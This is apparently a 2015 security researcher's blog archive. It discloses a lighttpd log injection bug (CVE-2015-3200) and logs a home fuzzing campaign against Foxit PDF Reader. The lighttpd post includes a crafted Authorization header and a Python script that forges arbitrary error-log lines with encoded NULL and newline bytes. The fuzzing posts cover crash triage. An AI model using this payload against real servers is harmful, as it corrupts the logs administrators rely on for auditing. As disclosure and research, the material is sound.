Monday, May 25, 2015


Last week I noticed an issue in the lighttpd server source code that makes log injection possible. I notified the developers and it was decided that because this issue does not result in RCE or DoS, but only affects the reliability of the logs, it is better to make it public. So here it is (still vulnerable, but now you know that logs might be tampered with).

CVE: CVE-2015-3200
Software: Lighttpd
Type: Log injection
Bug track link:
Source code Location: http_auth.c:860
Vulnerable servers: Servers that use basic authentication
Description: When the base64 string of a basic HTTP authentication header does not contain a colon character (or contains it only after a NULL byte, which can be embedded inside the base64 encoding), that situation is logged with the string ": is missing in " followed by the raw decoded base64 string. This means that newlines, NULL bytes and everything else can be base64-encoded and are then inserted into the logs verbatim after decoding.

For example, the header "Authorization: Basic dGVzdAAKMjEwMC0wMS0wMSAwMDowMDowMDogKG1hZ2ljLmMuODU5KSBJVCdTIFRIRSBFTkQgT0YgVEhFIFdPUkxEIQ==" results in two log lines:
2015-05-14 12:55:54: (http_auth.c.859) : is missing in test
2100-01-01 00:00:00: (magic.c.859) IT'S THE END OF THE WORLD!
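A header like the one above can be generated with a few lines of Python; this is my own sketch of how an attacker might build the payload (the forged log line content is of course arbitrary):

```python
import base64

# Forged line to smuggle into the error log (contents are arbitrary).
forged = "2100-01-01 00:00:00: (magic.c.859) IT'S THE END OF THE WORLD!"

# The NULL byte ensures no colon is seen before the string "ends",
# and the newline starts a fresh line in the log file.
payload = "test\x00\n" + forged

token = base64.b64encode(payload.encode("latin-1")).decode("ascii")
print("Authorization: Basic " + token)
```

Since the server logs the decoded bytes verbatim, everything after the newline shows up as its own, perfectly formatted log line.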

On another subject: does anyone know a place on the internet that requires basic authentication?

Monday, May 18, 2015

Foxit fuzzing ended

Because rebuilding my fuzzing machine took more time than predicted, I will not fuzz Foxit any further, and the results I described last time are the final ones (I will do some additional analysis and then send them to the developers - it seems that 15 unique crashes/memory corruptions is the final count after removing as many overlaps as I could with brief analysis). Also, because my fuzzing environment changed (I used 32-bit VMs and now use the 64-bit main machine directly), I can't continue calculating code coverage either - the differences in the OS have created additional coverage paths, and this would not give the information I need for exact statistics.
With the next filetype, I will do all the testing in the same environment and then hopefully get better statistics right up until the "end".

I will now continue using these 727 PDFs for testing other software, and hopefully it will be as successful as it was with Foxit - it was surprising to get this many crashes/memory corruptions with only simple fuzzing on a single home machine.

Thursday, May 14, 2015

SITREP on Foxit fuzzing

Here are the results of the halfway point of the Foxit fuzzing (I have to take a couple of days' pause, because some electrical work is being done nearby and I don't want to keep stuff running):

Total time: Around 1.5 weeks
Total number of crashes: 1699
Total number of testcases: ??? (when I was away, the main machine was shut down because of the electrical work nearby, so I have the crash reports but not the total number of tests run)
Unique crash signatures: 23
Most probably not exploitable: 15 (NULL pointers and related stuff)
Might be exploitable: 2 (one that seems to be an arbitrary write and one heap corruption)
No idea yet: 6 (some really strange crashes among them, but some seem to be endless-recursion type of stuff)

I also continued downloading new PDF files to test the predictions from the last post. I have downloaded about 60K by now and need around 100K more.

Saturday, May 2, 2015

Fuzzing prep

For the last 2 weeks I have been doing code coverage work on the 366K PDFs that I downloaded. As a base for code coverage I used Foxit PDF Reader (it's a single exe file - much simpler to break apart in IDA and find all the basic blocks to use for monitoring - simple tracing is too slow), and as a tool I used my own scripts built with Python and WinAppDbg.
Explaining all of the work of finding the PDFs, writing (and optimizing - very important when doing stuff on one home machine!) the code coverage tool, and finding the smallest subset of files would make too long a post for me to write now - but I thought some of the statistics would be interesting.

Base software: Foxit
Executable and dlls: Single exe file, size ~47MB
Basic code blocks found: 611927 (using IDA and my IDAPython script)
Files covered: 366027
Code blocks covered: 133661 (21.8%)
Final subset of files: 727 (0.2%)
Machines used: 5 VMs, each running a single instance (sadly this was the most stable setup when tested - I have to try some other approaches, because it's just a waste of resources)
Time cost: ~2 weeks
My own time spent (not counting tool development time before): maybe a couple of hours total. The tools did not crash or stop working even once (damn proud of that)
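Picking the smallest covering subset of files is essentially a set cover problem. The exact algorithm I won't describe here, but a greedy approximation over per-file basic-block sets (my own sketch, with made-up filenames and block addresses) would look something like this:

```python
def minimize_corpus(coverage):
    """Greedy set cover: repeatedly pick the file that adds the most
    not-yet-covered basic blocks.

    coverage: dict mapping filename -> set of basic-block addresses hit.
    Returns a small list of files that together cover every block seen.
    """
    covered = set()
    subset = []
    remaining = dict(coverage)
    while remaining:
        # File contributing the most new blocks.
        best = max(remaining, key=lambda f: len(remaining[f] - covered))
        if not (remaining[best] - covered):
            break  # nothing new left to gain
        covered |= remaining.pop(best)
        subset.append(best)
    return subset

# Toy example with made-up block addresses:
cov = {
    "a.pdf": {1, 2, 3},
    "b.pdf": {3, 4},
    "c.pdf": {1, 2},            # fully redundant given a.pdf
    "d.pdf": {4, 5, 6, 7},
}
print(minimize_corpus(cov))     # ['d.pdf', 'a.pdf']
```

Greedy set cover isn't optimal, but it is fast and usually close enough for corpus reduction.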

STATISTICS (taken during the process)

It's clear that I should have downloaded more files to get as good code coverage as possible with this method. The addition of new files to the resulting list did not stop even in the final batch - it was still running at 0.29 new files per 1000 input files covered. That means that for roughly every 3450 PDF files analyzed, I got one additional file in my final set. If the graph is to be trusted, this trend should end somewhere between 400K and 500K files. I will test this when I have downloaded the additional files. But until then, I will start fuzzing the 727 files that I ended up with - let's see what happens.
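As a quick sanity check on the numbers above (a rate of 0.29 new files per 1000 inputs versus one new file per roughly 3450 inputs):

```python
rate = 0.29 / 1000        # new subset files per analyzed input file
print(round(1 / rate))    # 3448 -> roughly one new file per ~3450 PDFs
```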

FIRST FUZZING RESULTS (first 10 hours of fuzzing Foxit)
Altogether 41 crashes and 10 unique ones (based on my tool that sorts by type and relative EIP):
  • 1 unique writeAV - could be exploitable, but a quick glance did not strengthen that opinion
  • 6 unique readAVs - all of them close to 0, so probably not exploitable
  • 1 unique readAV where it tries to read from address 0xBAADF00D, meaning uninitialized allocated heap content (the DEBUG version of HeapAlloc fills allocations with this pattern) was used as a pointer. Could be interesting
  • 2 unique crashes caused by unknown exceptions that were not caught by the handlers - I did not have time to investigate further
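My sorting tool is not public, but bucketing by exception type plus module-relative EIP boils down to something like this sketch (field names and the crash records are made up for illustration; the relative EIP is what survives ASLR between runs):

```python
def bucket_crashes(crashes):
    """Group crash records by (exception type, module, module-relative EIP)."""
    buckets = {}
    for c in crashes:
        key = (c["type"], c["module"], c["eip"] - c["module_base"])
        buckets.setdefault(key, []).append(c)
    return buckets

# Hypothetical crash records from two runs with different load bases:
crashes = [
    {"type": "READ_AV",  "module": "Foxit.exe", "eip": 0x401234, "module_base": 0x400000},
    {"type": "READ_AV",  "module": "Foxit.exe", "eip": 0x511234, "module_base": 0x510000},
    {"type": "WRITE_AV", "module": "Foxit.exe", "eip": 0x405678, "module_base": 0x400000},
]
buckets = bucket_crashes(crashes)
print(len(buckets))  # 2 unique signatures: the first two crashes collapse into one
```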